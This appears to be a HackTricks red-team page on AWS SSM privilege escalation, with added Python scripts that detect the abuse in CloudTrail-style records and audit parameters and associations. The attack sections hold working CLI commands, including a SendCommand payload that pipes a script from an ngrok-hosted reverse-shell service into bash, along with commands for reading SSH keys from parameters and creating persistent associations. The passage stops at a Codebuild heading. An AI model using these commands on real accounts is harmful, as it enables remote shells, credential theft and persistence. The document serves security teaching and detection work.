AWS - SSM Privesc
tip
Learn and practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn and practice GCP Hacking:
HackTricks Training GCP Red Team Expert (GRTE)
Learn and practice Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
SSM
For more information about SSM check:
AWS - EC2, EBS, ELB, SSM, VPC & VPN Enum
ssm:SendCommand
An attacker with the permission ssm:SendCommand can execute commands in instances running the Amazon SSM Agent and compromise the IAM Role running inside it.
# Check for configured instances
aws ssm describe-instance-information
aws ssm describe-sessions --state Active
# Send rev shell command
aws ssm send-command --instance-ids "$INSTANCE_ID" \
--document-name "AWS-RunShellScript" --output text \
--parameters commands="curl https://reverse-shell.sh/4.tcp.ngrok.io:16084 | bash"
If you are using this technique to escalate privileges inside an EC2 instance that is already compromised, you can catch the reverse shell locally on that instance with:
# If you are inside the machine you can catch the reverse shell within it
nc -lvnp 4444 #Inside the EC2 instance
aws ssm send-command --instance-ids "$INSTANCE_ID" \
--document-name "AWS-RunShellScript" --output text \
--parameters commands="curl https://reverse-shell.sh/127.0.0.1:4444 | bash"
Potential Impact: Direct privesc to the EC2 IAM roles attached to instances running SSM Agents.
ssm:StartSession
An attacker with the permission ssm:StartSession can start an SSH-like session in instances running the Amazon SSM Agent and compromise the IAM Role running inside it.
# Check for configured instances
aws ssm describe-instance-information
aws ssm describe-sessions --state Active
# Start an interactive session on the instance
aws ssm start-session --target "$INSTANCE_ID"
caution
To start a session you need the SessionManagerPlugin installed: https://docs.aws.amazon.com/systems-manager/latest/userguide/install-plugin-macos-overview.html
Potential Impact: Direct privesc to the EC2 IAM roles attached to instances running SSM Agents.
Privesc kwa ECS
When ECS tasks run with ExecuteCommand enabled, users with enough permissions can use ecs execute-command to execute a command inside the container.
According to the documentation, this is done by creating a secure channel between the device you use to initiate the "exec" command and the target container, using SSM Session Manager. (The SSM Session Manager Plugin is required for this to work.)
Therefore, users with ssm:StartSession will be able to get a shell inside ECS tasks that have that option enabled just by running:
aws ssm start-session --target "ecs:CLUSTERNAME_TASKID_RUNTIMEID"
Potential Impact: Direct privesc to the ECS IAM roles attached to running tasks with ExecuteCommand enabled.
ssm:ResumeSession
An attacker with the permission ssm:ResumeSession can re-start an SSH-like session in instances running the Amazon SSM Agent that have an SSM session in the disconnected state, and compromise the IAM Role running inside it.
# Check for configured instances
aws ssm describe-sessions
# Get resume data (you will probably need to do something else with this info to connect)
aws ssm resume-session \
--session-id Mary-Major-07a16060613c408b5
Potential Impact: Direct privesc to the EC2 IAM roles attached to running instances with SSM Agents and disconnected sessions.
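From the defender's side, the SendCommand, StartSession (including the ecs: target form used for ECS exec) and ResumeSession calls described in the sections above all land in CloudTrail. The following Python script is an added example, not code from the original page or from HackTricks: it scans a list of CloudTrail-style records and returns findings. The record layout (eventSource, eventName, userIdentity.arn, requestParameters) and every sample event are constructed for this example, and the script assumes that the commands parameter of a SendCommand record may be redacted in a real trail, so it alerts on the document name alone and inspects command text only when it is present.

```python
import re
from dataclasses import dataclass

# SSM documents that run arbitrary shell / PowerShell on the target instance.
SHELL_DOCUMENTS = {"AWS-RunShellScript", "AWS-RunPowerShellScript"}
# A download tool piped straight into an interpreter, the pattern the page's examples use.
REMOTE_PIPE_RE = re.compile(r"\b(curl|wget)\b.*\|\s*(?:ba|z|da)?sh\b")


@dataclass
class Finding:
    severity: str      # "low", "medium" or "high"
    event_name: str
    principal: str
    detail: str


def _commands(request):
    """Inline command list of a SendCommand request, or [] when the
    parameters are absent or redacted (a plain string instead of a map)."""
    params = request.get("parameters")
    if not isinstance(params, dict):
        return []
    cmds = params.get("commands", [])
    return cmds if isinstance(cmds, list) else [str(cmds)]


def analyse_ssm_event(event):
    """Findings for one CloudTrail-style record (assumed layout, see lead-in)."""
    if event.get("eventSource") != "ssm.amazonaws.com":
        return []
    name = event.get("eventName", "")
    req = event.get("requestParameters") or {}
    principal = event.get("userIdentity", {}).get("arn", "unknown")
    findings = []
    if name == "SendCommand":
        doc = req.get("documentName", "")
        targets = ",".join(req.get("instanceIds") or [])
        if doc in SHELL_DOCUMENTS:
            findings.append(Finding("medium", name, principal, f"{doc} sent to {targets}"))
        for cmd in _commands(req):
            if REMOTE_PIPE_RE.search(cmd):
                findings.append(Finding("high", name, principal,
                                        f"remote script piped into a shell: {cmd}"))
    elif name == "StartSession":
        target = req.get("target", "")
        if target.startswith("ecs:"):
            findings.append(Finding("medium", name, principal, f"ECS exec session to {target}"))
        else:
            findings.append(Finding("low", name, principal, f"interactive session to {target}"))
    elif name == "ResumeSession":
        findings.append(Finding("low", name, principal,
                                f"resumed session {req.get('sessionId', '')}"))
    return findings


def scan(records):
    findings = []
    for record in records:
        findings.extend(analyse_ssm_event(record))
    return findings


def severity_counts(findings):
    counts = {"low": 0, "medium": 0, "high": 0}
    for f in findings:
        counts[f.severity] += 1
    return counts


# Constructed sample records (not real CloudTrail data).
_WHO = {"arn": "arn:aws:iam::111111111111:user/example-user"}
SAMPLE_EVENTS = [
    {"eventSource": "ssm.amazonaws.com", "eventName": "SendCommand", "userIdentity": _WHO,
     "requestParameters": {"instanceIds": ["i-0example1"], "documentName": "AWS-RunShellScript",
                           "parameters": {"commands": ["curl https://example.invalid/x.sh | bash"]}}},
    {"eventSource": "ssm.amazonaws.com", "eventName": "SendCommand", "userIdentity": _WHO,
     "requestParameters": {"instanceIds": ["i-0example2"], "documentName": "AWS-RunShellScript",
                           "parameters": "HIDDEN_DUE_TO_SECURITY_REASONS"}},
    {"eventSource": "ssm.amazonaws.com", "eventName": "SendCommand",
     "userIdentity": {"arn": "arn:aws:iam::111111111111:role/patching-role"},
     "requestParameters": {"instanceIds": ["i-0example3"], "documentName": "AWS-UpdateSSMAgent"}},
    {"eventSource": "ssm.amazonaws.com", "eventName": "StartSession", "userIdentity": _WHO,
     "requestParameters": {"target": "ecs:example-cluster_0123456789abcdef_deadbeef"}},
    {"eventSource": "ssm.amazonaws.com", "eventName": "ResumeSession", "userIdentity": _WHO,
     "requestParameters": {"sessionId": "example-user-0123456789abcdef0"}},
    {"eventSource": "ec2.amazonaws.com", "eventName": "DescribeInstances", "userIdentity": _WHO,
     "requestParameters": {}},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.severity}] {f.event_name} by {f.principal}: {f.detail}")
```

The agent-update SendCommand from the patching role produces nothing, which is the point of keying on the document name: routine automation uses purpose-built documents, while AWS-RunShellScript and AWS-RunPowerShellScript are the ones that turn ssm:SendCommand into code execution, so they deserve a finding even when the command text is redacted.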
ssm:DescribeParameters, (ssm:GetParameter | ssm:GetParameters)
An attacker with the mentioned permissions will be able to list the SSM parameters and read them in clear-text. In these parameters you can frequently find sensitive information such as SSH keys or API keys.
aws ssm describe-parameters
# Suppose that you found a parameter called "id_rsa"
aws ssm get-parameters --names id_rsa --with-decryption
aws ssm get-parameter --name id_rsa --with-decryption
Potential Impact: Find sensitive information inside the parameters.
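The mitigation for the parameter reads described above is to keep secrets out of plain String parameters and to put SecureString parameters under a customer-managed KMS key, so that reading them needs kms:Decrypt on that key in addition to ssm:GetParameter. The following Python audit is an added example, not code from the original page or from HackTricks: it takes a Parameters list shaped like the output of describe-parameters (Name, Type, KeyId) plus CloudTrail-style GetParameter/GetParameters records, and reports secret-looking parameters that are not SecureString, SecureStrings under the AWS-managed alias/aws/ssm key, and which principals read parameters with decryption. The name heuristic, the record layout (withDecryption, name, names) and all sample data are constructed for the example.

```python
import re

# Parameter names that usually hold a secret (heuristic, constructed for this example).
SECRET_NAME_RE = re.compile(r"(id_rsa|ssh|key|token|secret|passw(or)?d|credential)", re.I)
# KeyId assumed to be reported for SecureStrings encrypted with the AWS-managed key.
AWS_MANAGED_SSM_KEY = "alias/aws/ssm"


def audit_parameters(parameters):
    """Return (name, severity, reason) tuples for weakly protected parameters."""
    findings = []
    for p in parameters:
        name, ptype, key_id = p.get("Name", ""), p.get("Type", ""), p.get("KeyId")
        if SECRET_NAME_RE.search(name) and ptype != "SecureString":
            findings.append((name, "high",
                             f"secret-looking name stored as {ptype}: readable with ssm:GetParameter(s) alone"))
        elif ptype == "SecureString" and key_id in (None, AWS_MANAGED_SSM_KEY):
            findings.append((name, "medium",
                             "SecureString under the AWS-managed key: no customer-owned key policy gates decryption"))
    return findings


def decrypted_reads(events):
    """Map each principal to the set of parameter names it read with decryption."""
    reads = {}
    for e in events:
        if e.get("eventSource") != "ssm.amazonaws.com":
            continue
        if e.get("eventName") not in ("GetParameter", "GetParameters"):
            continue
        req = e.get("requestParameters") or {}
        if not req.get("withDecryption"):
            continue
        names = req.get("names") or ([req["name"]] if "name" in req else [])
        principal = e.get("userIdentity", {}).get("arn", "unknown")
        reads.setdefault(principal, set()).update(names)
    return reads


# Constructed sample data (not real account content).
SAMPLE_PARAMETERS = [
    {"Name": "id_rsa", "Type": "String"},
    {"Name": "/prod/db/password", "Type": "SecureString", "KeyId": "alias/aws/ssm"},
    {"Name": "/prod/api/token", "Type": "SecureString",
     "KeyId": "arn:aws:kms:us-east-1:111111111111:key/example-key-id"},
    {"Name": "/prod/app/log_level", "Type": "String"},
    {"Name": "/prod/app/feature_flags", "Type": "StringList"},
]

_USER = {"arn": "arn:aws:iam::111111111111:user/example-user"}
_ROLE = {"arn": "arn:aws:iam::111111111111:role/app-role"}
SAMPLE_EVENTS = [
    {"eventSource": "ssm.amazonaws.com", "eventName": "GetParameter", "userIdentity": _USER,
     "requestParameters": {"name": "id_rsa", "withDecryption": True}},
    {"eventSource": "ssm.amazonaws.com", "eventName": "GetParameters", "userIdentity": _USER,
     "requestParameters": {"names": ["/prod/db/password", "/prod/api/token"], "withDecryption": True}},
    {"eventSource": "ssm.amazonaws.com", "eventName": "GetParameter", "userIdentity": _ROLE,
     "requestParameters": {"name": "/prod/app/log_level", "withDecryption": False}},
]

if __name__ == "__main__":
    for name, severity, reason in audit_parameters(SAMPLE_PARAMETERS):
        print(f"[{severity}] {name}: {reason}")
    for principal, names in decrypted_reads(SAMPLE_EVENTS).items():
        print(f"{principal} decrypted: {sorted(names)}")
```

Only the token under a customer-managed key passes both checks; the decryption map is what you would compare against the principals that are actually expected to read those names.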
ssm:ListCommands
An attacker with this permission can list all the commands sent and, hopefully, find sensitive information in them.
aws ssm list-commands
Potential Impact: Find sensitive information inside the command lines.
ssm:GetCommandInvocation, (ssm:ListCommandInvocations | ssm:ListCommands)
An attacker with these permissions can list all the commands sent and read the output they generated, hoping to find sensitive information in it.
# You can use either option to get the command-id and instance-id
aws ssm list-commands
aws ssm list-command-invocations
aws ssm get-command-invocation --command-id <cmd_id> --instance-id <i_id>
Potential Impact: Find sensitive information inside the output of the command lines.
Using ssm:CreateAssociation
An attacker with the ssm:CreateAssociation permission can create a State Manager Association to automatically execute commands on EC2 instances managed by SSM. These associations can be configured to run at set intervals, which makes them useful for backdoor-like persistence without interactive sessions.
aws ssm create-association \
--name SSM-Document-Name \
--targets Key=InstanceIds,Values=target-instance-id \
--parameters commands=["malicious-command"] \
--schedule-expression "rate(30 minutes)" \
--association-name association-name
note
This persistence method works as long as the EC2 instance is managed by Systems Manager, the SSM agent is running, and the attacker has permission to create associations. It does not rely on interactive sessions or on explicit ssm:SendCommand permissions. Important: the --schedule-expression parameter (for example, rate(30 minutes)) must respect AWS's minimum interval of 30 minutes. For immediate or one-time execution, omit --schedule-expression entirely; the association will then run once right after creation.
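Because an association keeps running on its schedule with no further API calls, it is worth auditing the associations that already exist rather than only watching CreateAssociation in CloudTrail. The following Python check is an added example, not code from the original page or from HackTricks: it takes association descriptions shaped like the output of describe-association (Name, Targets, Parameters, ScheduleExpression, AssociationName), flags the ones that run a shell document with inline commands, on a schedule or against wildcard targets, and includes a small rate() parser so the 30-minute minimum from the note above can be checked. The field layout and all sample data are constructed for the example.

```python
import re

# Documents that execute arbitrary shell / PowerShell through State Manager.
SHELL_DOCUMENTS = {"AWS-RunShellScript", "AWS-RunPowerShellScript"}
# Minimum rate() interval, as stated in the note above.
MIN_RATE_MINUTES = 30
RATE_RE = re.compile(r"^rate\((\d+)\s+(minute|hour|day)s?\)$")


def rate_minutes(expression):
    """Convert 'rate(N minutes|hours|days)' to minutes; None for cron() or malformed input."""
    if not expression:
        return None
    m = RATE_RE.match(expression.strip())
    if not m:
        return None
    n, unit = int(m.group(1)), m.group(2)
    return n * {"minute": 1, "hour": 60, "day": 1440}[unit]


def schedule_is_valid(expression):
    """True when the expression would be accepted: no schedule, a cron(), or a rate() of >= 30 minutes."""
    if not expression:
        return True
    if expression.startswith("cron("):
        return True
    mins = rate_minutes(expression)
    return mins is not None and mins >= MIN_RATE_MINUTES


def audit_association(assoc):
    """Return (label, severity, reason) for a shell-running association, or None if it uses another document."""
    doc = assoc.get("Name", "")
    if doc not in SHELL_DOCUMENTS:
        return None
    label = assoc.get("AssociationName") or assoc.get("AssociationId", "?")
    commands = (assoc.get("Parameters") or {}).get("commands", [])
    wildcard = any("*" in t.get("Values", []) for t in assoc.get("Targets", []))
    schedule = assoc.get("ScheduleExpression")
    reasons = []
    if commands:
        reasons.append("inline commands: " + "; ".join(commands))
    if schedule:
        mins = rate_minutes(schedule)
        reasons.append(f"recurring every {mins} min" if mins else f"schedule {schedule}")
    if wildcard:
        reasons.append("targets every managed instance")
    severity = "high" if commands and (schedule or wildcard) else "medium"
    return (label, severity, "; ".join(reasons) or f"runs {doc}")


def audit_associations(associations):
    return [f for f in (audit_association(a) for a in associations) if f]


# Constructed sample associations (not real account content).
SAMPLE_ASSOCIATIONS = [
    {"Name": "AWS-RunShellScript", "AssociationName": "nightly-cleanup",
     "Targets": [{"Key": "InstanceIds", "Values": ["i-0example1"]}],
     "Parameters": {"commands": ["example-command"]}, "ScheduleExpression": "rate(30 minutes)"},
    {"Name": "AWS-UpdateSSMAgent", "AssociationName": "agent-update",
     "Targets": [{"Key": "InstanceIds", "Values": ["*"]}], "ScheduleExpression": "rate(14 days)"},
    {"Name": "AWS-RunPowerShellScript", "AssociationId": "example-association-id",
     "Targets": [{"Key": "InstanceIds", "Values": ["*"]}],
     "Parameters": {"commands": ["Get-Service"]}},
    {"Name": "AWS-RunShellScript", "AssociationName": "one-off",
     "Targets": [{"Key": "InstanceIds", "Values": ["i-0example2"]}]},
]

if __name__ == "__main__":
    for label, severity, reason in audit_associations(SAMPLE_ASSOCIATIONS):
        print(f"[{severity}] {label}: {reason}")
```

The agent-update association is skipped on purpose: the interesting ones are those that hand a shell document a command string, and the combination of inline commands with either a schedule or a wildcard target is the shape the note describes.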
Codebuild
You can also use SSM to get inside a codebuild project while it is being built: